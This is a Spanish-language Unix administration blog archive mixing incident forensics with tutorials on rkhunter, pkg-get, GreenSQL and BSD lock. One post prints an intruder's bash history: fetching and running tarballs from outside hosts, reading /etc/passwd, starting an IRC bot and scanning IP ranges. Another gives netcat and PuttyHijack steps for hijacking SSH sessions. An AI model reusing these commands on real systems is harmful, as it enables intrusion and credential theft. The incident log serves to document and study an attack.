Archive for the ‘Seguridad’ Category
Historia de un Servidor Comprometido
14
Mar
Add Log
ls -al /home/info
drwxr-xr-x 6 root root 4096 Mar 13 17:40 ..
-rwxr-xr-x 1 info mailusers 655360 May 26 2005 2004
-rw-r–r– 1 info mailusers 269190 Jan 9 08:42 2004.TGZ
-rw-r–r– 1 info mailusers 522574 Feb 22 15:40 alex.tgz
-rw——- 1 info mailusers 1733 Mar 12 21:08 .bash_history
drwxr-xr-x 4 info mailusers 4096 Mar 12 11:47 emech
-rw-r–r– 1 info mailusers 233421 Mar 8 20:56 emech.tgz
drwxr-xr-x 3 info mailusers 4096 Jul 15 2007 psybnc-linux <<<<<psybnc?_??>
-rw-r–r– 1 info mailusers 568152 Sep 22 03:27 psybnc-linux.tgz
drwxr-xr-x 2 info mailusers 4096 Mar 12 18:48 ssh
-rw-r–r– 1 info mailusers 754228 Mar 6 21:22 ssh1.tgz
cat of history
w
cat /etc/hosts
w
ps x
ls -a
uname -a
wget http://nasa.undernet.nm.ru/2004.TGZ
tar zxvf 2004.TGZ
chmod +x 204
chmod +x 2004
./2004
uname -a
cat /etc/issue
ls -a
cat /etc/passwd
cd /tmp
ls -a
cd .webmin
ls -a
cd /dev/shm
ls -a
cat /proc/cpuinfo
wget http://ethical.ro/alex.tgz
tar zxvf alex.tgz
cd “. ”
./linux
chmod +x *
./linux
ls -a
cd /tmp
wget http://ethical.ro/alex.tgz
wget http://ethical.ro/emech.tgz
tar zxvf emech.tgz
cd emech
ls -a
rm -rf cyc.set
nano cyc.acc
nano cyc.acc.2
nano cyc.acc.3
nano cyc.acc.4
nano cyc.acc.5
wget http://ethical.ro/cyc.set
chmod +x *
killall -9 linux
./httpd
wget http://ftp.rz.tu-bs.de/pub/mirror/knoppix/knoppix-cd/KNOPPIX_V5.1.1CD-2007-01-04-DE.iso
wget ftp://ftp.kernel.org/pub/linux/kernel/v2.6/linux-2.6.9.tar.gz
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
ps x
w
ps x
w
pwd
cd
ls -a
wget http://ethical.ro/ssh1.tgz
tar zxvf ssh1.tgz <<<<cd ssh
./a 207.97
./a 210.97
./a 200.105
./a 62.2
./a 132.230
./a 190.66
./a 200.81
cat /etc/issue
w
uname -a
./a 220.34
./a 220.134</psybnc?_??>
Instalar Rkhunter en Solaris
14
Jan
Paso 1
/usr/sfw/bin/wget http://superb-east.dl.sourceforge.net/sourceforge/rkhunter/rkhunter-1.3.4.tar.gz
Paso 2
/usr/sfw/bin/gtar -xvpzf rkhunter-1.3.4.tar.gz
Paso 3
cd rkhunter-1.3.4
Paso 4
./installer.sh –layout /usr/local –install
Paso 5
/usr/local/bin/rkhunter –update
/usr/local/bin/rkhunter -c
Bueno andamos con exceso de carga de trabajo,proyectos personales y chambas extras
Asi que trataremos de poner los tutoriales que tengo pendientes Saludos
pkg-get en Solaris
15
Nov
#pkg-get en Solaris
(manejador de paquetes para solaris)
Como primer paso le recomiendo se den una vuelta por
http://www.bolthole.com/solaris/pkg-get.html Que es el sitio oficial para el manejador de paquetes que utilizaremos llamado
pkg-get
Usando pkg-get Y el repositorio blastwave podremos instalar software en nuestro Solaris/Open Solaris de manera similar a debían.
Primer Paso instala pkg-get
#pkgadd -d http://www.blastwave.org/pkg_get.pkg
Aceptamos todas las preguntas que nos hará el instalador,el repositorio a usar es www.blastwave.org que contiene 1700 paquetes de sofrware en su mayoria open source todo este repositorio trabaja bajo /opt/csw Y el Fichero de configuracion de pkg-get se encuentra en
/opt/csw/etc/pkg-get.conf
Definimos nuestro mirror a usar
url=http://mirrors.sunsite.dk/csw/stable
Si estamos atrás de un Firewall o algun Proxy
configuramos las lineas correspondientes
# If you are behind a firewall, set one of these as appropriate
#ftp_proxy=http://your-proxy:8023
#http_proxy=http://your-proxy:8023
#export http_proxy ftp_proxy
Guardamos y como primer paso
#/opt/csw/bin/pkg-get -U
Y es todo a instalar el software que necesitemos
Se me ocurre instalar
/opt/csw/bin/pkg-get -i nano
/opt/csw/bin/pkg-get -i bash
/opt/csw/bin/pkg-get -i vim
En el siguiente tutorial sera configuracion de postfix en Solaris Usando Mysql para la BD de usuarios
Dudas a roa@unixmexico.org/roa@tucancunix.net
GreenSQL (Firewall para Mysql) Prevenir SQL Injection
31
Oct
GreenSQL is an Open Source database firewall used to protect databases from SQL injection attacks. GreenSQL works as a proxy and has built in support for MySQL. The logic is based on evaluation of SQL commands using a risk scoring matrix as well as blocking known db administrative commands (DROP, CREATE, etc). GreenSQL is distributed under the GPL license.
</div>
http://www.greensql.net/
http://howtoforge.com/preventing-mysql-injection-attacks-with-greensql-on-debian-etch
PuttyHijack
04
Aug
Esta tool llamada PuttyHijack Su descripción dice mas que mil palabras
““PuttyHijack is a POC tool that injects a dll into the Putty process to hijack an existing, or soon to be created, connection. This can be useful during penetration tests when a windows box that has been compromised is used to SSH/Telnet into other servers.””"
Requerimientos
Windows Machine
Netcat
Putty
##Manos a la obra
nc -vv -lp 6666 <<<No Requiere Explicación oh si?
putty.exe cualquier server
PuttyHijack.exe 127.0.0.1 6666
Después de esto estoy seguro que lo pensaran antes de conectarse a sus servidores usando Putty desde cualquier Cyber Cafe
Anexo Screen
Curso De Seguridad de Tucancunix
16
Feb
Se pospone
Por causas de fuerza mayor se recorre la fecha.
Esta semana se notificar de una nueva fecha a los que se inscribieron.
Saludos.
Atentamente
Staff de Tucancunix
Lock en BSD
17
Jan
Usando Lock en Freebsd,Netbsd,Openbsd
Si no las vivimos en una terminal como es mi caso y tenemos que ir al baño podremos hacer uso del comando
lock este tip les puede servir.
$ lock
Key:
Again:
lock: /dev/ttyp2 on Roa. timeout in 15 minutes.
time now is Wed Jan 16 23:22:23 CST 2008
Key:
#Si queremos volver a usar la terminal introduciremos el password previamente
escrito al invocar el comando lock.
Por default toma 15 minutos
Podremos dejarlo por tiempo indefinido
$ lock -n
Key:
Again:
lock: /dev/ttyp2 on Roa. no timeout.
time now is Wed Jan 16 23:25:26 CST 2008
Key: